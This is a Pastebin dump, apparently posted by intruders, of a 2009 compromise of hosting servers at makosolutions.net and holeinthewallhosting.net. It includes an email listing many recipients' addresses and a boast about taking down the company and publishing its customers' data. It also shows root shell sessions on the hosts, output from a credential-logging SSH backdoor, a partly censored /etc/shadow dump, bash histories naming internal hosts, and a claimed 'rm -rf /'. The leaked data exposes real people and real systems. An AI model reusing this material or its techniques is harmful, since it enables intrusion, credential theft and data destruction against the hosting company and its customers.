Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _______ _______ .________
- \ _ \ ___ __\ _ \ | ____/
- / /_\ \\ \/ / /_\ \ |____ \
- \ \_/ \> <\ \_/ \/ \
- \_____ /__/\_ \\_____ /______ /
- \/ \/ \/ \/
- __ .__ __ .__
- _____ _____ | | ______ __________ | | __ ___/ |_|__| ____ ____ ______
- / \\__ \ | |/ / _ \/ ___/ _ \| | | | \ __\ |/ _ \ / \ / ___/
- | Y Y \/ __ \| < <_> )___ ( <_> ) |_| | /| | | ( <_> ) | \\___ \
- |__|_| (____ /__|_ \____/____ >____/|____/____/ |__| |__|\____/|___| /____ >
- \/ \/ \/ \/ \/ \/
- __________ _________
- \______ \_______ ____ / _____/ ____ ____
- ______ | ___/\_ __ \/ _ \\_____ \_/ __ \_/ ___\
- /_____/ | | | | \( <_> ) \ ___/\ \___
- |____| |__| \____/_______ /\___ >\___ >
- \/ \/ \/
- Delivered-To: glafkos@gmail.com
- Received: by 10.223.117.209 with SMTP id s17cs437044faq;
- Thu, 2 Jul 2009 13:31:48 -0700 (PDT)
- Received: by 10.224.67.129 with SMTP id r1mr663571qai.234.1246566706699;
- Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
- Return-Path: <glafk0s@hotmail.com>
- Received: from blu0-omc4-s21.blu0.hotmail.com (blu0-omc4-s21.blu0.hotmail.com [65.55.111.160])
- by mx.google.com with ESMTP id 2si5595246yxe.16.2009.07.02.13.31.45;
- Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
- Received-SPF: pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) client-ip=65.55.111.160;
- Authentication-Results: mx.google.com; spf=pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) smtp.mail=glafk0s@hotmail.com
- Received: from BLU123-W9 ([65.55.111.135]) by blu0-omc4-s21.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);
- Thu, 2 Jul 2009 13:31:22 -0700
- Message-ID: <BLU123-W96370B1DA99ABE688265BEB2F0@phx.gbl>
- Return-Path: glafk0s@hotmail.com
- Content-Type: multipart/alternative;
- boundary="_817cc510-a5cf-4a68-bec3-2a43760f95ae_"
- X-Originating-IP: [188.51.85.13] // You still have a lot to learn :)
- From: james knuth <glafk0s@hotmail.com>
- To: <micronet@aol.com>, <mikespry.mdots@mdots.net>, <jstrat85@aol.com>,
- <vlad@zealus.com>, <let995@yahoo.com>, <dejan@dwhost.net>,
- <democreations@gmail.com>, <sales@hostforwebsite.com>,
- <holeinthewallhosting@gmail.com>, <lucacri@gmail.com>, <k.ma@utoronto.ca>,
- <dsecuya@gmail.com>, <peteslaughterbeck@yahoo.com>,
- <michael.bastian@gmail.com>, <fletro@gmail.com>, <aalyazeedi@peo.gov.qa>,
- <msprycha@makosolutions.com>, <glafkos@gmail.com>,
- <horsepowerlounge@gmail.com>, <info@hostwebservice.com>,
- <dave@bavariansolutions.com>, <keishaf18@yahoo.com>,
- <adthorn@rochester.rr.com>, <mr22774556@live.com>, <vienna@consult.co.at>,
- <bruno.matthys@gmail.com>
- Subject: Makosolutions, LLC
- Date: Thu, 2 Jul 2009 22:31:22 +0200
- Importance: Normal
- MIME-Version: 1.0
- X-OriginalArrivalTime: 02 Jul 2009 20:31:22.0341 (UTC) FILETIME=[10245150:01C9FB54]
- MakoSolutions, LLC // The remaining content of this email has been provided to the proper authorities
- - Hacked.
- I will keep this short and simple, you hosted someone I want down and I decided to take down your company
- and publish your customers information for that.
- // This is not your game anymore "Faisal Hourani". It seems that your anti-sec ideals were just excuses..
- HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ
- +----------------------------[ Owned ]----------------------------+
- | Hack everyone you can and then hack some more |
- | Owned[DC] v2 |
- | _______ . _______ . _______ |
- | Get in as anonymous, Leave with no trace. |
- | |
- +-----------------------------------------------------------------+
- [ Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp i686 ]
- 08:24:44 up 519 days, 11:20, 3 users, load average: 0.05, 0.10, 0.09
- makos2 pts/1 61.17.231.6 Fri Jun 26 08:12 still logged in
- makos2 pts/3 61.17.231.6 Fri Jun 26 04:10 - 04:25 (00:15)
- makos2 pts/7 61.17.231.6 Fri Jun 26 04:09 - 04:09 (00:00)
- makos2 pts/5 61.17.231.6 Fri Jun 26 03:58 - 04:09 (00:11)
- makos2 pts/4 61.17.231.6 Fri Jun 26 03:54 still logged in
- wtmp begins Tue Jun 2 01:09:06 2009
- Owned[DC]:[~]# date
- Fri Jun 26 08:26:44 EDT 2009
- Owned[DC]:[~]# uname -a
- Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp #1 SMP Wed Dec 19 16:01:12 EST 2007 i686 athlon i386 GNU/Linux
- Owned[DC]:[~]#
- Owned[DC]:[~]# cd /var/run/ssh
- Owned[DC]:[/var/run]# gcc -o decode decode.c
- Owned[DC]:[/var/run]# ./decode ssh.old
- HOOKOUT: 67.225.142.98 root:_censored_
- HOOKIN: root:_censored_
- HOOKOUT: 66.96.220.213 root:_censored_
- .
- .
- .
- HOOKIN: makos2:_censored_
- HOOKOUT: 64.191.116.202 root:_censored_
- Owned[DC]:[/var/run]# w
- 08:32:59 up 519 days, 11:28, 3 users, load average: 0.23, 0.22, 0.13
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- makos2 pts/0 61.17.231.6 03:53 3:54 0.13s 0.00s sshd: makos2 [priv]
- makos2 pts/1 61.17.231.6 08:12 6.00s 0.06s 0.01s sshd: makos2 [priv]
- makos2 pts/4 61.17.231.6 03:54 18:40 0.02s 0.01s sshd: makos2 [priv]
- Owned[DC]:[/var/run]#
- Owned[DC]:[/var/run]# cat /etc/shadow
- root:_censored_:14418:0:99999:7:::
- bin:*:13901:0:99999:7:::
- daemon:*:13901:0:99999:7:::
- adm:*:13901:0:99999:7:::
- lp:*:13901:0:99999:7:::
- sync:*:13901:0:99999:7:::
- shutdown:*:13901:0:99999:7:::
- halt:*:13901:0:99999:7:::
- mail:*:13901:0:99999:7:::
- news:*:13901:0:99999:7:::
- uucp:*:13901:0:99999:7:::
- operator:*:13901:0:99999:7:::
- games:*:13901:0:99999:7:::
- gopher:*:13901:0:99999:7:::
- ftp:*:13901:0:99999:7:::
- nobody:*:13901:0:99999:7:::
- dbus:!!:13901:0:99999:7:::
- vcsa:!!:13901:0:99999:7:::
- rpm:!!:13901:0:99999:7:::
- haldaemon:!!:13901:0:99999:7:::
- netdump:!!:13901:0:99999:7:::
- nscd:!!:13901:0:99999:7:::
- sshd:!!:13901:0:99999:7:::
- rpc:!!:13901:0:99999:7:::
- mailnull:!!:13901:0:99999:7:::
- smmsp:!!:13901:0:99999:7:::
- pcap:!!:13901:0:99999:7:::
- xfs:!!:13901:0:99999:7:::
- pegasus:!!:13901:0:99999:7:::
- mysql:!!:13901::::::
- mailman:*:13901::::::
- cpanel:*:13901::::::
- systuser:!!:13901:0:99999:7:::
- named:!!:13901::::::
- clamav:!!:13901::::::
- dorothy:_censored_:14126:0:99999:7:::
- fileport:_censored_:13902:0:99999:7:::
- icstune:_censored_:13902:0:99999:7:::
- krisez:_censored_$LRTAc0.mSw4a72zaVSGJd0:13902:0:99999:7:::
- kurwaun:_censored_$Y5V5WC30jDTB7h2HEuPWv0:13902:0:99999:7:::
- makos:_censored_$6sPV/Yt2K90ah60vxrRE/.:14418:0:99999:7:::
- makos2:_censored_$gUs1XceJmqOgEaHbeaQJN/:14418:0:99999:7:::
- marcin:_censored_$CZjERtIuP0ob.TJhixQr5.:13902:0:99999:7:::
- mdots:_censored_$JCyJyAL8iXQMeOQbF0jMo.:13902:0:99999:7:::
- mklounge:_censored_$1Uw2zWBge5A2GLQqWS5Mn.:13902:0:99999:7:::
- nashv:_censored_$h/475XUYdCfNl2N.mgPgV0:13902:0:99999:7:::
- rogo:_censored_$6V878RKV1W/E4NPoGJHKu/:14192:0:99999:7:::
- spanish:_censored_$h902kmWzyxUw1wwSMWWyp/:13902:0:99999:7:::
- sprynet:_censored_$Zm2b8RGX0d8/qo5tSuJA3/:13902:0:99999:7:::
- statewi:_censored_$EPK2zdk0Z9ET48XrRcsKJ1:14376:0:99999:7:::
- tarocon:_censored_$6me2YVq3JQ0PeDFLV7Aml0:14073:0:99999:7:::
- sprycha:_censored_$osQE8JvfI0lC/r464r1.30:13903:0:99999:7:::
- hplounge:_censored_$59BBs5nOeFGPRO8hEj1F1.:13922:0:99999:7:::
- cozy:_censored_$tj.rlOAmhdwJm6fdWPvv2.:13923:0:99999:7:::
- cpanel-horde:*:13949::::::
- cpanel-phpmyadmin:*:13949::::::
- cpanel-phppgadmin:*:13949::::::
- makospam:_censored_$9mTDWRT8N8NZ7hFUa.2Iv1:13962:0:99999:7:::
- wiredbre:_censored_$jc6LduZz25ERlx0SSp6I8.:13980:0:99999:7:::
- cybermun:_censored_$gSpGZJCyrf5eKoKXzoknb/:13984:0:99999:7:::
- proto:_censored_$fuGMvBK.mAz7AO989Reqm/:14208:0:99999:7:::
- tempecon:_censored_$M3wPHFn06YfnjqhpOoSis1:13995:0:99999:7:::
- floralsi:_censored_$jboZSeeKKAecDPW7Xi8r01:13995:0:99999:7:::
- serversh:_censored_$oh7hdFXLoQM7BtHaVIwDB0:13997:0:99999:7:::
- simplify:_censored_$FRrjF78SYaCEyBK/zX9rU0:14025:0:99999:7:::
- themunst:_censored_$YHtOc1ylvVbXQjSjCuMMS.:14017:0:99999:7:::
- theregoe:_censored_$U1OUx/hznz7Z/cRxknMpV1:14019:0:99999:7:::
- xbox360t:_censored_$52N4Y3wbF4I.j0xw0ybZv0:14027:0:99999:7:::
- barbiedo:_censored_$dYASLs0QEHczZNK/xO4l60:14033:0:99999:7:::
- c20q8anz:_censored_$5yj/Vw9bVQE1H8gFGnfwl0:14031:0:99999:7:::
- bashingr:_censored_$40Rbu9u.CdR54/.QGx5hZ.:14034:0:99999:7:::
- hawaiian:_censored_$YXD5Fqnc1wa47hXw5DS1z/:14036:0:99999:7:::
- cnewyork:_censored_$auEIntz4K2naChQ6A8j42.:14035:0:99999:7:::
- lasvegas:_censored_$O8g7FiIF7Z.G1BLakQhjl.:14035:0:99999:7:::
- contourp:_censored_$Mhq3nTK4slo39beK7mAsV/:14036:0:99999:7:::
- musiconl:_censored_$g.3Wk0K3xRAd8bzMfetZz0:14036:0:99999:7:::
- jokesfor:_censored_$332BH8Z2tQ1.PoLUj0aeQ.:14036:0:99999:7:::
- cpanelhorde:*:14037::::::
- cpanelphpmyadmin:*:14037::::::
- cpanelphppgadmin:*:14037::::::
- cpanelroundcube:*:14037::::::
- okcityco:_censored_$sRF34svAMlqkUvqPQyEXq/:14039:0:99999:7:::
- pasadena:_censored_$IDwtddZgxQPTnlqIEiRd/.:14039:0:99999:7:::
- ionsigns:_censored_$Vg7G3SaNWflS1zTsWy.b50:14292:0:99999:7:::
- cherubim:_censored_$DIouDCIf0zrNJHJj1Hijy0:14042:0:99999:7:::
- sanfranc:_censored_$G1VXarugAKLCe0mTh1mjz1:14042:0:99999:7:::
- jillrace:_censored_$GWkRrIh91Slq3d4fP4Ysh/:14042:0:99999:7:::
- portland:_censored_$9RiJMMNQaYXloc80zzyve/:14042:0:99999:7:::
- newyorkc:_censored_$r/hkQYZAe3aMB2h72VDVE.:14042:0:99999:7:::
- renoconc:_censored_$HreCJL6jaESpLR4GNQU2X0:14042:0:99999:7:::
- indianap:_censored_$K69/LXuR2.0309THXC3IR1:14042:0:99999:7:::
- lvconcer:_censored_$0SOI7NDDrTatWwv1qUtKw.:14042:0:99999:7:::
- miamicon:_censored_$10LHNdaYHowHSELzvFlfW.:14042:0:99999:7:::
- whatupla:_censored_$qBSgboCAfNT0K55szVNGv0:14322:0:99999:7:::
- zconcert:_censored_$kj.cK7mz2sEam.1wusPIQ1:14042:0:99999:7:::
- tokyocon:_censored_$bdBjHYHi4oSDqBsL/yHuS0:14042:0:99999:7:::
- uhouston:_censored_$x/aaM4f.jxN1wMDYHnc/h.:14042:0:99999:7:::
- raleigh:_censored_$tEFo7l/iuN.pRKxTSlCCe1:14042:0:99999:7:::
- flagstaf:_censored_$mKfuTWqfxbt3X1ddt5fUK/:14042:0:99999:7:::
- phoenixa:_censored_$5R9rVBeLzwZtIXTgSbfI9/:14042:0:99999:7:::
- ap6mz0q2:_censored_$cfbHH6J9VN9UOr3KBZ9ts.:14042:0:99999:7:::
- xq9s3ma:_censored_$vVfRtpDm4j1Uj08OcYmwG1:14044:0:99999:7:::
- jacksonv:_censored_$yOc3XavkD3xVFrV/IyvKF.:14046:0:99999:7:::
- exspry:_censored_$R/sFQOBW4EgGIThYQj28k.:14047:0:99999:7:::
- exmako:_censored_$/YcknpKQlOCdzVzgWbJRM/:14048:0:99999:7:::
- quagmire:_censored_$IrcWo57PYhw9lyNR8FlqR.:14049:0:99999:7:::
- njmakos:_censored_$eLWUwH4sqaSjYNDDQD8uc.:14049:0:99999:7:::
- vicscust:_censored_$zD1TjhIzUZXrqOlHSMKDv0:14220:0:99999:7:::
- losangel:_censored_$ApXNU5tVAZvvTZ8wKhfrG0:14053:0:99999:7:::
- newengla:_censored_$1inQwoEWSRR/mbuH/U8fj1:14053:0:99999:7:::
- lvconven:_censored_$Pi1JPn.1OrKH5JaI5GjPf0:14055:0:99999:7:::
- lvtrades:_censored_$dr.bC2FHXaV6QITM0lmbn1:14055:0:99999:7:::
- nyctrade:_censored_$dAeNUEisO8nI1GxoDK7Bq0:14055:0:99999:7:::
- services:_censored_$/MGwtjcf.Ru7o7y/HDd6P/:14068:0:99999:7:::
- worships:_censored_$DD7lYOZiW2VfGQARqj4Nw/:14070:0:99999:7:::
- eworship:_censored_$/RA2I.4drunr/Q5sEk/gA1:14070:0:99999:7:::
- aemotors:_censored_$yHBjKMyrCFRYaGnSuAc420:14083:0:99999:7:::
- workfrom:_censored_$8whIbBBBjYzZxgDDDuMde.:14091:0:99999:7:::
- megaspel:_censored_$aO1t9Wneps4O6nDXFn.84/:14093:0:99999:7:::
- espel:_censored_$PNoLG3/nFppUcjJB7Ndkc1:14093:0:99999:7:::
- dyna:_censored_$oeAPTO2pNcYr7jguVfS.o0:14097:0:99999:7:::
- niklas:_censored_$MLPe0p9S4Wz.ficqPiWE3.:14098:0:99999:7:::
- glendale:_censored_$36WbIrHoaY6p.wQHDMKSI/:14112:0:99999:7:::
- theworkf:_censored_$k9UTdl9Xszol3vXe8XJex/:14113:0:99999:7:::
- missreso:_censored_$cMQPqmDGUCrI5GCTJ95IW1:14114:0:99999:7:::
- theletro:_censored_$uSdV14r/ad2VSUSQN076J1:14137:0:99999:7:::
- simobilg:_censored_$lgR0ZcRPsacgrXN0CyTph/:14163:0:99999:7:::
- concert:_censored_$u78BVeFn/9dqijD5FxFn30:14167:0:99999:7:::
- worldsbe:_censored_$KhYsNIhpV/9MpNLsJ7KkD1:14176:0:99999:7:::
- x1qo0xmz:_censored_$35pb2Tt3NF7mcdwa8ij0S/:14210:0:99999:7:::
- american:_censored_$f64FdDQZShu/QPCT01cig.:14212:0:99999:7:::
- firstrat:_censored_$Cg447uD7Pf1PSfs03LyFI0:14217:0:99999:7:::
- xq05vz73:_censored_$H96kS5lH6gbiK3ShSPwJG.:14219:0:99999:7:::
- imsauto:_censored_$18x.Al7E/c8nKVG5w4ge90:14225:0:99999:7:::
- headwayp:_censored_$5.CQnCYJzlFnw10dJB1fo/:14253:0:99999:7:::
- performa:_censored_$RXFC0.Y9sd19TL59ulzBy0:14248:0:99999:7:::
- snowboar:_censored_$S0pOHKtr37Qp283oBChtz0:14246:0:99999:7:::
- importeu:_censored_$0vHEmwZW2WImMY8i961N7.:14260:0:99999:7:::
- holyschn:_censored_$yyYCxFr6MAeXOFS4uGZxE1:14262:0:99999:7:::
- rivercit:_censored_$JhMlSLJOJxGB84SdIX9VL0:14271:0:99999:7:::
- perform:_censored_$MwABPul6js/dDkESj3NCa/:14334:0:99999:7:::
- sco:_censored_$mD1J7V6/XgnGKexigg7ZQ/:14342:0:99999:7:::
- austinar:_censored_$kwPledBlp5.5FRj7TCsXF.:14349:0:99999:7:::
- arlingto:_censored_$HOPfqdVPLDjcKYOYXBssZ.:14350:0:99999:7:::
- albuquer:_censored_$IIfpFNji/HFkgySU9QPyZ.:14350:0:99999:7:::
- jvconcer:_censored_$Up603l0cXWF0BisBD010v/:14352:0:99999:7:::
- sanjosec:_censored_$6lZMqhYCRgu07TQSTca1D.:14352:0:99999:7:::
- sdconcer:_censored_$jsdhywYTV6.yqzfh7IApB1:14352:0:99999:7:::
- bukemark:_censored_$giCqM37r16fagpVb.7SlB/:14363:0:99999:7:::
- laconcer:_censored_$WBI4s4H3O7Slpsk7zrZpj.:14366:0:99999:7:::
- dforce:_censored_$fjjNVrQw8LPQCDcgXRUkc1:14392:0:99999:7:::
- Owned[DC]:[/backup]# cat ~/.bash_history
- ssh 64.191.54.229 -l butts
- #1244614734
- ssh 64.191.54.229 -l butts
- #1244651529
- ssh butts@64.191.54.229
- #1244644856
- ssh 66.96.220.213 -l makosolutions
- #1244644866
- ssh 66.96.220.213 -l makosolutions -p 2222
- #1244645088
- ssh 66.96.220.213 -l mako -p 2222
- #1244650823
- top -c
- #1244651468
- ssh 66.96.220.213
- #1244651606
- ssh 66.96.220.213 -l makosolutions
- #1244659374
- ifconfig | grep 67.225.142.98
- #1244659384
- ssh -l butts server.holeinthewallhosting.com
- #1244659474
- nmap server.holeinthewallhosting.com
- #1244659875
- ssh -l butts server.holeinthewallhosting.com
- #1244659891
- ssh -l butts 64.191.54.229
- #1244677757
- ssh -l makosolutions 66.96.220.213
- #1244810932
- exit
- #1244944507
- ssh 64.191.54.229 -l butts
- #1244971944
- ssh -l butts 64.191.54.229
- #1245004682
- ssh 64.191.116.203
- #1245013655
- exit
- #1245067142
- ssh 66.96.220.213
- #1245062070
- ssh 66.96.220.213
- #1245074394
- ssh 64.191.116.203
- #1245076716
- exit
- #1245058974
- ssh 66.96.220.213
- #1245082594
- ssh 64.191.116.203
- #1245141381
- grep nukelar.reality-matrix.org /etc/trueuserdomains
- #1245141388
- grep nukelar.reality-matrix.org /etc/userdomains
- #1245141593
- ssh 64.191.116.203
- #1245161918
- ssh 66.96.220.213
- #1245161939
- telnet 66.96.220.213 22
- #1245161953
- telnet 66.96.220.213 53
- #1245161969
- nmap 66.96.220.213
- #1245162042
- ssh 66.96.220.213 -p 80
- #1245147550
- ssh 64.191.116.203
- #1244659875
- ssh -l butts server.holeinthewallhosting.com
- #1244659891
- ssh -l butts 64.191.54.229
- #1244677757
- ssh -l makosolutions 66.96.220.213 // infosec.org.uk
- #1244810932
- exit
- #1244944507
- ssh 64.191.54.229 -l butts
- #1244971944
- ssh -l butts 64.191.54.229
- #1245004682
- ssh 64.191.116.203
- #1245013655
- exit
- #1245067142
- ssh 66.96.220.213
- #1245062070
- ssh 66.96.220.213
- #1245074394
- ssh 64.191.116.203
- #1245076716
- exit
- #1245058974
- ssh 66.96.220.213
- #1245082594
- ssh 64.191.116.203
- #1245141381
- grep nukelar.reality-matrix.org /etc/trueuserdomains
- #1245141388
- grep nukelar.reality-matrix.org /etc/userdomains
- #1245141593
- ssh 64.191.116.203
- #1245161918
- ssh 66.96.220.213
- #1245161939
- telnet 66.96.220.213 22
- #1245161953
- telnet 66.96.220.213 53
- #1245161969
- nmap 66.96.220.213
- #1245162042
- ssh 66.96.220.213 -p 80
- #1245147550
- ssh 64.191.116.203
- #1245184460
- ssh 66.96.220.213
- #1245199770
- ssh -l makosolutions 66.96.220.213
- #1245318670
- vi /etc/csf/csf.denyip
- #1245318687
- ssh 66.96.220.213
- #1245318707
- ssh root@66.96.220.213
- #1245318749
- ssh mako@66.96.220.213 -p2222
- #1245318770
- ssh mako@66.96.220.213 -p 2222
- #1245318842
- ssh mako@66.96.220.213 -p2222
- #1245316906
- ssh 66.7.198.124
- #1245317031
- ssh 66.7.198.124
- #1245317159
- ssh 66.96.220.213
- #1245318179
- ssh 66.96.220.213
- #1245319038
- ssh 67.225.159.152
- #1245319073
- ssh 67.225.159.152 -p22
- #1245319077
- ssh 67.225.159.152 -p 22
- .
- .
- .
- csf -l | grep 66.96.211.181
- #1245999632
- apf
- #1246000060
- ssh 66.96.211.181 -l root
- #1246000637
- grep 66.96.211.181 /var/log/messages
- #1246002631
- cat /usr/local/psa/version
- #1246002640
- ls /usr/local/psa/version
- #1246015247
- ls /usr/local/psa/version
- #1245998530
- ssh 64.191.72.85
- #1245998556
- telnet 64.191.72.85 25
- #1245998595
- vzlist -a
- #1246001328
- ssh 64.191.72.85
- Owned[DC]:[/backup]# df -h
- Filesystem Size Used Avail Use% Mounted on
- /dev/sda7 2.0G 426M 1.5G 23% /
- /dev/sdb1 147G 61G 79G 44% /backup
- /dev/sda1 1012M 46M 915M 5% /boot
- none 2.0G 0 2.0G 0% /dev/shm
- /dev/sda8 121G 32G 83G 28% /home
- /dev/sda6 2.0G 37M 1.9G 2% /tmp
- /dev/sda2 9.9G 5.6G 3.9G 60% /usr
- /dev/sda5 9.9G 2.1G 7.3G 23% /var
- /tmp 2.0G 37M 1.9G 2% /var/tmp
- Owned[DC]:[/backup]#
- Owned[DC]:[/etc/pam.d]# cat sshd
- #%PAM-1.0
- auth required pam_stack.so service=system-auth
- auth required pam_nologin.so
- account required pam_stack.so service=system-auth
- password required pam_stack.so service=system-auth
- session required pam_stack.so service=system-auth
- session required pam_loginuid.so
- auth required pam_shells.so
- Owned[DC]:[/var/run]# hostname
- puma.makosolutions.net
- Owned[DC]:[/var/run]#
- Owned[DC]:[~]# lsof -i TCP:22
- COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
- sshd 17433 root 3u IPv6 791605626 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
- sshd 17441 makos2 3u IPv6 791605626 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
- sshd 21409 root 3u IPv6 791273811 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
- sshd 21412 makos2 3u IPv6 791273811 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
- sshd 26799 root 3u IPv6 791290938 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
- sshd 26806 makos2 3u IPv6 791290938 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
- ssh 26887 root 3u IPv4 791291132 TCP puma.makosolutions.net:42625->serv.localhost:ssh (ESTABLISHED)
- sshd 29596 root 3u IPv6 791533593 TCP puma.makosolutions.net:ssh->188.51.85.13:34957 (ESTABLISHED)
- // RoMeO logged in just before the rm -rf / of makosolutions.com
- sshd 30850 root 3u IPv6 783032196 TCP *:ssh (LISTEN)
- _______ _______ ________
- \ _ \ ___ __\ _ \ / _____/
- / /_\ \\ \/ / /_\ \/ __ \
- \ \_/ \> <\ \_/ \ |__\ \
- \_____ /__/\_ \\_____ /\_____ /
- \/ \/ \/ \/
- .__ .__ .__ __ .__ .__ .__
- | |__ ____ | | ____ |__| _____/ |_| |__ ______ _ _______ | | | |
- | | \ / _ \| | _/ __ \| |/ \ __\ | \_/ __ \ \/ \/ /\__ \ | | | |
- | Y ( <_> ) |_\ ___/| | | \ | | Y \ ___/\ / / __ \| |_| |__
- |___| /\____/|____/\___ >__|___| /__| |___| /\___ >\/\_/ (____ /____/____/
- \/ \/ \/ \/ \/ \/
- .__ __ .__
- | |__ ____ _______/ |_|__| ____ ____
- | | \ / _ \/ ___/\ __\ |/ \ / ___\ ______
- | Y ( <_> )___ \ | | | | | \/ /_/ > /_____/
- |___| /\____/____ > |__| |__|___| /\___ /
- \/ \/ \//_____/
- __________ _________
- \______ \_______ ____ / _____/ ____ ____
- | ___/\_ __ \/ _ \\_____ \_/ __ \_/ ___\
- | | | | \( <_> ) \ ___/\ \___
- |____| |__| \____/_______ /\___ >\___ >
- \/ \/ \/
- 64.191.54.229 0x3aownt:DlE46Y8KpH
- +----------------------------[ Owned ]----------------------------+
- | Hack everyone you can and then hack some more |
- | Owned[DC] v2 |
- | _______ . _______ . _______ |
- | Get in as anonymous, Leave with no trace. |
- | |
- +-----------------------------------------------------------------+
- [ Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 i686 ]
- 11:12:13 up 78 days, 17:02, 0 users, load average: 1.73, 2.17, 2.23
- mrich pts/0 75-28-177-133.li Thu Jun 25 22:40 - 22:47 (00:06)
- jayzer pts/1 cpe-76-183-78-13 Thu Jun 25 00:45 - 00:49 (00:04)
- fmystic pts/1 cpe-71-67-100-61 Wed Jun 24 23:27 - 00:14 (00:46)
- butts pts/0 puma.makosolutio Wed Jun 24 21:47 - 02:54 (05:07)
- bwc05 pts/1 host-136-245.flt Wed Jun 24 00:18 - 00:18 (00:00)
- wtmp begins Wed Apr 29 04:10:02 2009
- root@server [~]#
- root@server [~]# lsof -i -n | grep ssh
- sshd 13173 root 3u IPv6 496962909 TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
- sshd 13176 hsp 3u IPv6 496962909 TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
- sshd 13285 root 3u IPv6 496964091 TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
- sshd 13287 stephenm 3u IPv6 496964091 TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
- sshd 13287 stephenm 7u IPv4 505107114 TCP 64.191.54.229:53259->192.168.1.121:icslap (SYN_SENT)
- sshd 13287 stephenm 8u IPv4 505106277 TCP 64.191.54.229:38749->192.121.86.4:http (SYN_SENT)
- sshd 30096 root 3u IPv6 485663697 TCP *:ssh (LISTEN)
- root@server [~]#
- root@server [/var/run]# gcc -o decode decode.c
- ͏Іʵroot@server [/var/run]# ./decode ssh.old
- HOOKIN: falados:$.lWKq._censored_
- HOOKIN: smithah:_censored_
- .
- .
- .
- HOOKIN: karsh:vnm_censored_
- HOOKIN: karsh:vnm_censored_
- HOOKIN: smithah:Coverfir_censored_
- HOOKIN: karsh:vn_censored_
- HOOKIN: mrich:t23_censored_
- root@server [/var/run]#
- root@server [/var/run]# hostname
- server.holeinthewallhosting.net
- root@server [/var/run]# uname -a
- Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 #1 SMP Tue Aug 5 07:41:53 EDT 2008 i686 i686 i386 GNU/Linux
- root@server [/var/run]# date
- Fri Jun 26 11:16:32 CDT 2009
- root@server [/var/run]# ifconfig -a
- eth0 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
- inet addr:64.191.54.229 Bcast:64.191.54.239 Mask:255.255.255.240
- inet6 addr: fe80::219:d1ff:fefb:459b/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:739777531 errors:0 dropped:0 overruns:0 frame:0
- TX packets:970111216 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:587506583 (560.2 MiB) TX bytes:4170982921 (3.8 GiB)
- Interrupt:217 Base address:0x2000
- eth0:1 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
- inet addr:64.191.54.230 Bcast:64.191.54.255 Mask:255.255.255.0
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- Interrupt:217 Base address:0x2000
- eth0:2 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
- inet addr:64.191.54.231 Bcast:64.191.54.255 Mask:255.255.255.0
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- Interrupt:217 Base address:0x2000
- eth0:3 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
- inet addr:64.191.54.232 Bcast:64.191.54.255 Mask:255.255.255.0
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- Interrupt:217 Base address:0x2000
- eth0:4 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
- inet addr:64.191.54.233 Bcast:64.191.54.255 Mask:255.255.255.0
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- Interrupt:217 Base address:0x2000
- eth0:5 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
- inet addr:64.191.36.197 Bcast:64.191.36.207 Mask:255.255.255.240
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- Interrupt:217 Base address:0x2000
- eth0:6 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
- inet addr:64.191.36.198 Bcast:64.191.36.207 Mask:255.255.255.240
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- Interrupt:217 Base address:0x2000
- eth0:7 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
- inet addr:64.191.36.199 Bcast:64.191.36.207 Mask:255.255.255.240
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- Interrupt:217 Base address:0x2000
- eth0:8 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
- inet addr:64.191.36.200 Bcast:64.191.36.207 Mask:255.255.255.240
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- Interrupt:217 Base address:0x2000
- eth0:9 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
- inet addr:64.191.36.201 Bcast:64.191.36.207 Mask:255.255.255.240
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- Interrupt:217 Base address:0x2000
